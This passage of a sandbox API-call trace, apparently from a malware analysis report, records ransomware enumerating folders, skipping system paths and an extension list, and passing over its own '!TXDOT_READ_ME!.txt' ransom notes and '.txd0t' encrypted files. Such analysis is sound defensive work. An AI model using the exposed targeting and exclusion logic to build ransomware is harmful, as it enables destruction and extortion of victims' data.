(lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\local\\") returned 0x0 [0115.605] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\locallow\\") returned 0x0 [0115.609] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\all users\\microsoft\\") returned 0x0 [0115.609] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\inetpub\\logs\\") returned 0x0 [0115.609] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\boot\\") returned 0x0 [0115.610] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\perflogs\\") returned 0x0 [0115.610] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\programdata\\") returned 0x0 [0115.610] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\drivers\\") returned 0x0 [0115.610] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\wsus\\") returned 0x0 [0115.626] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\efstmpwp\\") returned 0x0 [0115.626] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\$recycle.bin\\") returned 0x0 [0115.626] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="crypt_detect") returned 0x0 [0115.626] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="cryptolocker") returned 0x0 [0115.630] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="ransomware") returned 0x0 [0115.630] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\WINDOWS") returned 0x0 [0115.630] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files (x86)") returned 0x0 [0115.634] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files") returned 0x0 [0115.634] GetProcessHeap () returned 0xe30000 [0115.634] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0115.634] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0115.634] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\*") returned="C:\\588bce7c90097ed212\\1033\\*" [0115.646] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58324e32, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1ab0 [0115.654] StrCmpW (psz1=".", psz2=".") returned 0 [0115.654] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58324e32, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.655] StrCmpW (psz1="..", psz2=".") returned 1 [0115.670] StrCmpW (psz1="..", psz2="..") returned 0 [0115.670] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581a7728, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x581a7728, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x581a7728, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0115.670] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0115.670] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0115.670] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0115.670] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0115.670] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt" [0115.670] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0115.670] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0115.670] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0115.671] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0115.671] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0115.671] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0115.671] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0x581a7728, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe74, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0115.671] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0115.671] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0115.671] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0115.671] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0115.671] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t" [0115.671] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0115.671] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.671] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12fb0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0115.671] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0115.671] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0115.671] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0115.671] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0115.671] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t" [0115.671] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0115.671] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.671] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0115.671] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0115.671] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0115.671] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0115.671] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0115.671] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" [0115.671] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.671] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0115.671] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0115.672] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0115.672] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.672] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0115.672] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0115.672] FindClose (in: hFindFile=0xec1ab0 | out: hFindFile=0xec1ab0) returned 1 [0115.672] GetProcessHeap () returned 0xe30000 [0115.672] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0115.672] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1035", cAlternateFileName="")) returned 1 [0115.672] StrCmpW (psz1="1035", psz2=".") returned 1 [0115.672] StrCmpW (psz1="1035", psz2="..") returned 1 [0115.684] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0115.684] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0115.684] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1035", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0115.684] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system32\\") returned 0x0 [0115.685] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\syswow64\\") returned 0x0 [0115.685] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system\\") returned 0x0 [0115.685] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\winsxs\\") returned 0x0 [0115.685] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\roaming\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\local\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\locallow\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\all users\\microsoft\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\inetpub\\logs\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\boot\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\perflogs\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\programdata\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\drivers\\") returned 0x0 [0115.689] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\wsus\\") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\efstmpwp\\") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\$recycle.bin\\") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="crypt_detect") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="cryptolocker") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="ransomware") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\WINDOWS") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files (x86)") returned 0x0 [0115.693] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files") returned 0x0 [0115.693] GetProcessHeap () returned 0xe30000 [0115.693] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0115.697] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0115.697] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\*") returned="C:\\588bce7c90097ed212\\1035\\*" [0115.697] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1930 [0115.710] StrCmpW (psz1=".", psz2=".") returned 0 [0115.714] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.714] StrCmpW (psz1="..", psz2=".") returned 1 [0115.714] StrCmpW (psz1="..", psz2="..") returned 0 [0115.714] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5828f8fb, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0115.718] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0115.718] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0115.718] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0115.718] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0115.718] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt" [0115.734] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0115.734] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0115.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0115.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0115.739] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0115.739] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0115.739] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0115.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0115.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0115.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0115.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0115.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0115.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0115.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0115.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0115.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0115.747] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1076, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0115.759] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0115.759] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0115.759] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0115.759] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0115.763] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t" [0115.763] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0115.763] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.763] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12ede, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0115.767] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0115.767] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0115.767] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0115.767] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0115.767] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t" [0115.768] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0115.771] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.771] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0115.771] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0115.772] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0115.772] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0115.772] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0115.786] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" [0115.786] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.791] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0115.791] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 